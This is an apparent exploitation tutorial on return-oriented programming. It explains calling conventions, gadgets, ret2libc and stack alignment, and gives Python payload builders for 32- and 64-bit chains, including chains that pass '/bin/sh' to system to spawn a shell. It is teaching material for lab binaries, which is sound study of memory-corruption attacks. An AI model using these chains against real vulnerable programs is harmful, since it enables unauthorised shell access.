Utilising Calling Conventions
The program expects the stack to be laid out like this before executing the function:
So why don't we provide it like that? As well as the function, we also pass the return address and the parameters.
Everything after the address of flag() will be part of the stack frame for the next function, as it is expected to be there - instead of using push instructions, we just overwrite the values manually.
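As a minimal sketch of that 32-bit layout, the payload below is built with only the Python standard library. Every number in it (the padding length, the address of flag(), the return address and both parameter values) is a hypothetical placeholder, not a value taken from a real binary.

```python
import struct

def p32(value):
    """Pack an integer as a 4-byte little-endian word (x86 byte order)."""
    return struct.pack("<I", value)

# Hypothetical placeholders - substitute the values from your own binary.
PADDING_LEN = 52          # bytes needed to reach the saved return pointer
FLAG_ADDR = 0x080491C3    # address of flag()
RETURN_ADDR = 0x0         # where flag() would return to; unused here
PARAM_1 = 0xDEADC0DE      # first parameter
PARAM_2 = 0xC0DED00D      # second parameter

payload = b"A" * PADDING_LEN
payload += p32(FLAG_ADDR)    # overwrites the saved return pointer
payload += p32(RETURN_ADDR)  # the return address flag() expects to find
payload += p32(PARAM_1)      # parameters follow the return address
payload += p32(PARAM_2)

print(payload.hex())
```

The order matters: the function address comes first, then its return address, then the parameters in the order they are declared.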
Same logic, except we have to utilise the gadgets we talked about previously to fill the required registers (in this case rdi and rsi, as we have two parameters).
We have to fill the registers before the function is called.
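The 64-bit version could be sketched like this. The gadget addresses, the padding length and the address of flag() are all assumptions made for illustration; a real binary may only offer a differently shaped gadget (for example one that pops an extra register), in which case an extra filler value is needed.

```python
import struct

def p64(value):
    """Pack an integer as an 8-byte little-endian word (x86-64 byte order)."""
    return struct.pack("<Q", value)

# Hypothetical placeholders - substitute the values from your own binary.
PADDING_LEN = 56
POP_RDI = 0x4011CB      # address of a `pop rdi; ret` gadget
POP_RSI = 0x4011C9      # address of a `pop rsi; ret` gadget
FLAG_ADDR = 0x401142    # address of flag()
RETURN_ADDR = 0x0       # where flag() would return to; unused here
PARAM_1 = 0xDEADC0DE
PARAM_2 = 0xC0DED00D

payload = b"A" * PADDING_LEN
payload += p64(POP_RDI) + p64(PARAM_1)   # first parameter goes into rdi
payload += p64(POP_RSI) + p64(PARAM_2)   # second parameter goes into rsi
payload += p64(FLAG_ADDR)                # registers are set, now call flag()
payload += p64(RETURN_ADDR)              # return address sits after the function

print(payload.hex())
```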
Bypassing NX
The basis of ROP is chaining together small chunks of code already present within the binary itself in such a way as to do what you wish. This often involves passing parameters to functions already present within libc, such as system - if you can find the location of a command string, such as cat flag.txt, and then pass it as a parameter to system, it will execute that command and return the output. A more dangerous command is /bin/sh, which when run by system gives the attacker a shell, much like the shellcode we used did.
Doing this, however, is not as simple as it may seem at first. To be able to properly call functions, we first have to understand how to pass parameters to them.
The standard ROP exploit
A ret2libc is based on the system function found within the C library. This function executes any command string passed to it, making it the best target. Another thing found within libc is the string /bin/sh; if you pass this string to system, it will pop a shell.
And that is the entire basis of it - passing /bin/sh as a parameter to system. Doesn't sound too bad, right?
To start with, we are going to disable ASLR. ASLR randomises the location of libc in memory, meaning we cannot (without other steps) work out the location of system and /bin/sh. To understand the general theory, we will start with it disabled.
Fortunately, Linux has a command called ldd, which lists the shared libraries a program is dynamically linked against. If we run it on our compiled ELF file, it'll tell us the libraries it uses and the base addresses they are loaded at.
We need libc.so.6, so the base address of libc is 0xf7dc2000.
Libc base and the system and /bin/sh offsets may be different for you. This isn't a problem - it just means you have a different libc version. Make sure you use your values.
To call system, we obviously need its location in memory. We can use the readelf command for this.
The -s flag tells readelf to display the symbol table, which includes functions. Here we can find the offset of system from libc base is 0x44f00.
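With ASLR disabled, the runtime address of system is simply the libc base plus that offset. A quick sketch of the arithmetic, using the two values quoted above (yours may differ):

```python
LIBC_BASE = 0xF7DC2000    # base address of libc, as reported by ldd
SYSTEM_OFFSET = 0x44F00   # offset of system within libc, from readelf -s

# The address of any libc symbol is base + offset.
system_addr = LIBC_BASE + SYSTEM_OFFSET

print(hex(system_addr))  # 0xf7e06f00
```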
Since /bin/sh is just a string, we can use strings on the dynamic library we just found with ldd. Note that when passing strings as parameters you need to pass a pointer to the string, not the bytes of the string itself, because that's how C expects it.
-a tells it to scan the entire file; -t x tells it to output the offset in hex.
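The same search can be sketched in Python by looking for the NUL-terminated byte sequence directly. The helper name string_offset and the sample bytes are made up for illustration; the sample is a tiny stand-in, not real libc contents.

```python
def string_offset(blob, needle=b"/bin/sh\x00"):
    """Return the offset of the first occurrence of needle inside blob."""
    offset = blob.find(needle)
    if offset < 0:
        raise ValueError("string not found")
    return offset

# Stand-in for the bytes of a library file (hypothetical contents).
sample = b"\x7fELF" + b"\x00" * 12 + b"/bin/sh\x00" + b"exit 0\x00"

print(hex(string_offset(sample)))  # 0x10
```

For a real library you would read the file's bytes first, then add the libc base to the returned offset to get the pointer to pass to system.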
Repeat the process with the libc linked to the 64-bit exploit (should be called something like /lib/x86_64-linux-gnu/libc.so.6).
Note that instead of passing the parameter in after the return pointer, you will have to use a pop rdi; ret gadget to put it into the RDI register.
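To make the difference concrete, here is a rough side-by-side sketch of the two chains (without the padding that precedes them). The function names are invented for this example, and every address in the usage lines is a hypothetical placeholder.

```python
import struct

def ret2libc_32(system, binsh, ret_addr=0):
    """32-bit: system, then its return address, then the pointer argument."""
    return struct.pack("<III", system, ret_addr, binsh)

def ret2libc_64(pop_rdi, system, binsh, ret_addr=0):
    """64-bit: the gadget loads RDI from the stack before system runs."""
    return struct.pack("<QQQQ", pop_rdi, binsh, system, ret_addr)

# Hypothetical addresses, for illustration only.
chain32 = ret2libc_32(system=0xF7E06F00, binsh=0xF7F4E000)
chain64 = ret2libc_64(pop_rdi=0x4011CB,
                      system=0x7FFFF7E37000,
                      binsh=0x7FFFF7F79000)

print(chain32.hex())
print(chain64.hex())
```

In the 32-bit chain the argument sits after the return address; in the 64-bit chain it sits directly after the gadget that pops it.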
Unsurprisingly, pwntools has a bunch of features that make this much simpler.
The 64-bit looks essentially the same.
Pwntools can simplify it even more with its ROP capabilities, but I won't showcase them here.
A more in-depth look into parameters for 32-bit and 64-bit programs
Let's have a quick look at the source:
Pretty simple.
If we run the 32-bit and 64-bit versions, we get the same output:
Just what we expected.
Let's open the binary up in radare2 and disassemble it.
If we look closely at the calls to sym.vuln, we see a pattern:
We literally push the parameter to the stack before calling the function. Let's break on sym.vuln.
The first value there is the return pointer that we talked about before - the second, however, is the parameter. This makes sense because the return pointer gets pushed during the call, so it should be at the top of the stack. Now let's disassemble sym.vuln.
Here I'm showing the full output of the command because a lot of it is relevant. radare2 does a great job of detecting local variables - as you can see at the top, there is one called arg_8h. Later this same one is compared to 0xdeadbeef:
Clearly that's our parameter.
So now we know, when there's one parameter, it gets pushed to the stack so that the stack looks like:
Let's disassemble main again here.
Hohoho, it's different. As we mentioned before, the parameter gets moved to rdi (in the disassembly here it's edi, but edi is just the lower 32 bits of rdi, and the parameter is only 32 bits long, so it says EDI instead). If we break on sym.vuln again we can check rdi with the command
Just dr will display all registers.
Awesome.
Registers are used for parameters, but the return address is still pushed onto the stack, and in ROP it is placed right after the function address.
We've seen the full disassembly of an almost identical binary, so I'll only isolate the important parts.
It's just as simple - push them in reverse order of how they're passed in. The reverse order becomes helpful when you set a breakpoint with db sym.vuln and print out the stack.
So it becomes quite clear how more parameters are placed on the stack:
So as well as rdi, we also load values into rsi and rdx (or, in this case, their lower 32 bits).
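The register order for integer parameters in the 64-bit System V calling convention is rdi, rsi, rdx, rcx, r8, r9. A small sketch of that mapping follows; the function name and the three argument values are arbitrary choices for illustration.

```python
# Integer/pointer argument registers, in order, for the System V x86-64 ABI.
ARG_REGISTERS = ("rdi", "rsi", "rdx", "rcx", "r8", "r9")

def assign_registers(*args):
    """Map up to six integer arguments onto their 64-bit registers."""
    if len(args) > len(ARG_REGISTERS):
        raise ValueError("further arguments are passed on the stack")
    # Mask each value to 64 bits, the width of the full register.
    return {reg: arg & 0xFFFFFFFFFFFFFFFF
            for reg, arg in zip(ARG_REGISTERS, args)}

regs = assign_registers(0xDEADBEEF, 0xDEADC0DE, 0xC0DED00D)

# edi is just the lower 32 bits of rdi.
edi = regs["rdi"] & 0xFFFFFFFF

print({name: hex(value) for name, value in regs.items()})
print(hex(edi))
```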
Just to show that it is in fact ultimately rdi and not edi that is used, I will alter the original one-parameter code to utilise a bigger number:
If you disassemble main, you can see it disassembles to
movabs is how the disassembler shows a mov that loads a full 64-bit immediate into a register - treat it as if it's a mov.
Controlling execution with snippets of code
Gadgets are small snippets of code followed by a ret instruction, e.g. pop rdi; ret. We can manipulate the ret of these gadgets in such a way as to string together a large chain of them to do what we want.
Let's for a minute pretend the stack looks like this during the execution of a pop rdi; ret gadget.
What happens is fairly obvious - 0x10 gets popped into rdi as it is at the top of the stack during the pop rdi. Once the pop occurs, rsp moves:
And since ret is equivalent to pop rip, 0x5655576724 gets moved into rip. Note how the stack is laid out for this.
When we overwrite the return pointer, we overwrite the value pointed at by rsp. Once that value is popped, rsp points at the next value on the stack - but wait. We can overwrite the next value on the stack too.
Let's say that we want to exploit a binary to jump to a pop rdi; ret gadget, pop 0x100 into rdi, then jump to flag(). Let's step through the execution.
On the original ret, which we overwrite the return pointer for, we pop the gadget address in. Now rip moves to point to the gadget, and rsp moves to the next memory address.
rsp moves to the 0x100; rip to the pop rdi. Now when we pop, 0x100 gets moved into rdi.
RSP moves onto the next item on the stack, the address of flag(). The ret is executed and flag() is called.
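The walkthrough above can be mimicked with a toy model of the stack. This is only a simulation of the pop and ret bookkeeping, not real execution; the function name run_chain and both addresses are hypothetical.

```python
def run_chain(stack, gadgets):
    """Simulate ret-driven execution over a list of stack values.

    stack   - values starting at the overwritten return pointer
    gadgets - maps a gadget address to the registers it pops before its ret
    Returns the final register values and the address execution ends at.
    """
    regs = {}
    sp = 0
    rip = stack[sp]          # the original ret pops the first value into rip
    sp += 1
    while rip in gadgets:
        for reg in gadgets[rip]:
            regs[reg] = stack[sp]   # each pop takes the value rsp points at
            sp += 1
        rip = stack[sp]             # the gadget's own ret pops the next value
        sp += 1
    return regs, rip

POP_RDI = 0x4011CB    # hypothetical address of `pop rdi; ret`
FLAG = 0x401142       # hypothetical address of flag()

regs, final_rip = run_chain([POP_RDI, 0x100, FLAG], {POP_RDI: ["rdi"]})

print(hex(regs["rdi"]), hex(final_rip))  # 0x100 0x401142
```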
Essentially, if the gadget pops values from the stack, simply place those values afterwards (including the pop rip in ret). If we want to pop 0x10 into rdi and then jump to 0x16, our payload would look like this:
Note if you have multiple pop instructions, you can just add more values.
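A minimal sketch of both cases, leaving out the padding that comes before the chain. The gadget addresses are hypothetical, as is the existence of a two-pop gadget in any particular binary.

```python
import struct

def chain(*values):
    """Concatenate 64-bit little-endian words into a ROP chain."""
    return b"".join(struct.pack("<Q", v) for v in values)

POP_RDI = 0x4011CB        # hypothetical `pop rdi; ret`
POP_RSI_R15 = 0x4011C9    # hypothetical `pop rsi; pop r15; ret`

# One pop: gadget, value for rdi, then the address ret jumps to.
single = chain(POP_RDI, 0x10, 0x16)

# Two pops: one value per pop, in order, then the address ret jumps to.
multi = chain(POP_RSI_R15, 0x20, 0x0, 0x16)

print(single.hex())
print(multi.hex())
```

The 0x0 in the second chain is filler for r15, a register we do not care about but still have to supply a value for.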
We use rdi as an example because, if you remember, that's the register for the first parameter in 64-bit. This means control of this register using this gadget is important.
We can use the tool ROPgadget to find possible gadgets.
Combine it with grep to look for specific registers.
A minor issue
A small issue you may get when pwning on 64-bit systems is that your exploit works perfectly locally but fails remotely - or even fails when you try to use the provided LIBC version rather than your local one. This arises due to something called stack alignment.
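Essentially, the x86-64 ABI requires the stack to be 16-byte aligned when a call instruction is executed. LIBC takes advantage of this and uses SSE instructions to optimise execution; system in particular utilises instructions such as movaps, which fault if their memory operand is not 16-byte aligned.
That means that if the stack is not 16-byte aligned - that is, RSP is not a multiple of 16 - the ROP chain will fail on system.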
The fix is simple - in your ROP chain, before the call to system, place a single ret gadget:
This works because the extra ret pops one more value off the stack, moving RSP forward by 8 bytes and aligning it.
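The arithmetic behind the fix, plus a chain with the extra gadget in place, might look like the sketch below. The RSP value and every address are hypothetical placeholders chosen only to illustrate the 8-byte shift.

```python
import struct

def is_aligned(rsp):
    """True when rsp is a multiple of 16."""
    return rsp % 16 == 0

# Hypothetical RSP at the point where an aligned access would happen.
rsp_without_ret = 0x7FFFFFFFE0A8
rsp_with_ret = rsp_without_ret + 8   # one extra ret pops one more 8-byte value

print(is_aligned(rsp_without_ret), is_aligned(rsp_with_ret))  # False True

# Hypothetical addresses for the chain itself.
RET = 0x40101A
POP_RDI = 0x4011CB
BINSH = 0x7FFFF7F79000
SYSTEM = 0x7FFFF7E37000

# The lone ret comes first; the rest of the chain is unchanged.
aligned_chain = b"".join(struct.pack("<Q", v)
                         for v in (RET, POP_RDI, BINSH, SYSTEM))
```

Since every ret moves RSP by 8, a single extra ret is always enough to switch between the misaligned and aligned cases.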